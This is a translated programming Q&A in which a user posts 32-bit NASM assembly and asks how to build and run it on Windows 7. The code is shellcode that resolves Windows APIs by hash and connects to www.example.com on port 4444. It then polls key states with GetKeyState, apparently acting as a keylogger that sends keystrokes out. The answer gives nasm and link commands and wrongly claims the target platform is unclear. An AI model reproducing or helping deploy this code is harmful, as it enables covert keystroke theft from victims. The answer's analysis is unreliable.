如何在Windows 7 32位上编译/执行以下代码?

时间:2016-11-16 19:52:10

标签: windows compilation execute machine-code

您能告诉我如何在Windows 7 32位机器上执行此代码吗? 我需要编译吗?如果是的话,我该怎么办呢? 该文件应该以哪个结尾(.exe)?

section .bss

section .data

section .text
   global _start
      _start:
    cld
    call dword loc_88h
    pushad
    mov ebp,esp 
    xor eax,eax
    mov edx,[fs:eax+0x30]
    mov edx,[edx+0xc]
    mov edx,[edx+0x14]
    loc_15h:
    mov esi,[edx+0x28]
    movzx ecx,word [edx+0x26]
    xor edi,edi
loc_1eh:
    lodsb
    cmp al,0x61
    jl loc_25h
    sub al,0x20
loc_25h:
    ror edi,byte 0xd
    add edi,eax
    loop loc_1eh
    push edx
    push edi
    mov edx,[edx+0x10]
    mov ecx,[edx+0x3c]
    mov ecx,[ecx+edx+0x78]
    jecxz loc_82h
    add ecx,edx
    push ecx
    mov ebx,[ecx+0x20]
    add ebx,edx
    mov ecx,[ecx+0x18]
loc_45h:
    jecxz loc_81h
    dec ecx
    mov esi,[ebx+ecx*4]
    add esi,edx
    xor edi,edi
loc_4fh:
    lodsb
    ror edi,byte 0xd
    add edi,eax
    cmp al,ah
    jnz loc_4fh
    add edi,[ebp-0x8]
    cmp edi,[ebp+0x24]
    jnz loc_45h
    pop eax 
    mov ebx,[eax+0x24]
    add ebx,edx
    mov cx,[ebx+ecx*2]
    mov ebx,[eax+0x1c]
    add ebx,edx
    mov eax,[ebx+ecx*4]
    add eax,edx
    mov [esp+0x24],eax
    pop ebx
    pop ebx
    popad
    pop ecx
    pop edx
    push ecx
    jmp eax
loc_81h:
    pop edi
loc_82h:
    pop edi
    pop edx
    mov edx,[edx]
    jmp short loc_15h
loc_88h:
    pop ebp
    push dword 0x3233 
    push dword 0x5f327377
    push esp
    push dword 0x726774c
    call ebp
    mov eax,0x190
    sub esp,eax
    push esp
    push eax
    push dword 0x6b8029
    call ebp
    push byte +0x10
    jmp dword loc_1ceh
loc_b2h:
    push dword 0x803428a9
    call ebp
    lea esi,[eax+0x1c]
    xchg esi,esp
    pop eax
    xchg esp,esi
    mov esi,eax
    push dword 0x6c6c
    push dword 0x642e7472
    push dword 0x6376736d
    push esp
    push dword 0x726774c
    call ebp
    jmp dword loc_1e3h
loc_dfh:
    push dword 0xd1ecd1f
    call ebp
    xchg ah,al
    ror eax,byte 0x10
    inc eax
    inc eax
    push esi
    push eax
    mov esi,esp
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    inc eax
    inc eax
    push eax
    push eax
    push dword 0xe0df0fea
    call ebp
    mov edi,eax
loc_104h:
    push byte +0x10
    push esi
    push edi
    push dword 0x6174a599
    call ebp
    test eax,eax
    jz loc_122h
    dec dword [esi+0x8]
    jnz loc_104h
    xor eax,eax
    push eax
    push dword 0x56a2b5f0
    call ebp
loc_122h:
    push dword 0x3233
    push dword 0x72657375
    push esp
    push dword 0x726774c
    call ebp
    push dword 0x657461
    push dword 0x74537965
    push dword 0x4b746547
    push esp
    push eax
    push dword 0x7802f749
    call ebp
    push esi
    push edi
    push eax
    xor ecx,ecx
    mov esi,ecx
    mov cl,0x8
loc_155h:
    push esi
    loop loc_155h
loc_158h:
    xor ecx,ecx
    xor esi,esi
    push byte +0x8
    push dword 0xe035f044
    call ebp
loc_165h:
    mov eax,esi
    cmp al,0xff
    jnc loc_158h
    inc esi
    push esi
    call dword [esp+0x24]
    mov edx,esi
    xor ecx,ecx
    mov cl,0x80
    and eax,ecx
    xor ecx,ecx
    cmp eax,ecx
    jnz loc_18fh
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    btr [esp+eax*4],edx
    jmp short loc_165h
loc_18fh:
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bt [esp+eax*4],edx
    jc loc_165h
    xor edx,edx
    mov ecx,edx
    mov eax,esi
    mov cl,0x20
    div ecx
    bts [esp+eax*4],edx
    push esi
    push byte +0x10
    push dword [esp+0x30]
    push byte +0x0
    push byte +0x1
    lea ecx,[esp+0x10]
    push ecx
    push dword [esp+0x3c]
    push dword 0xdf5c9d75
    call ebp
    lea esp,[esp+0x4]
    jmp short loc_158h
loc_1ceh:
    call dword loc_b2h
    db "www.example.com",0
loc_1e3h:
    call dword loc_dfh
    db "4444",0

1 个答案:

答案 0 :(得分:1)

这看起来像32位NASM汇编代码(A simple beginners introduction)。您可以使用来自NASM网站的this installer 汇总(而不是编译它)(在回答时版本为2.12.02)。

在Windows 7上组装和链接它的工作原理如下:

如果您有Microsoft C编译器,那么您(在某处)有来自Microsoft的名为link.exe的链接器。如果不这样做,可以下载Windows 7 SDK,它提供C编译器和链接器(link.exe)。

nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib

但是快速浏览代码可以明显看出其中有 NO 明显命名的API调用,因此目标平台(Windows,Linux,MacOS,其他)很难确定。所以这段代码可能会汇编,但它的执行可能会(!)无用(除非在调试器中运行)。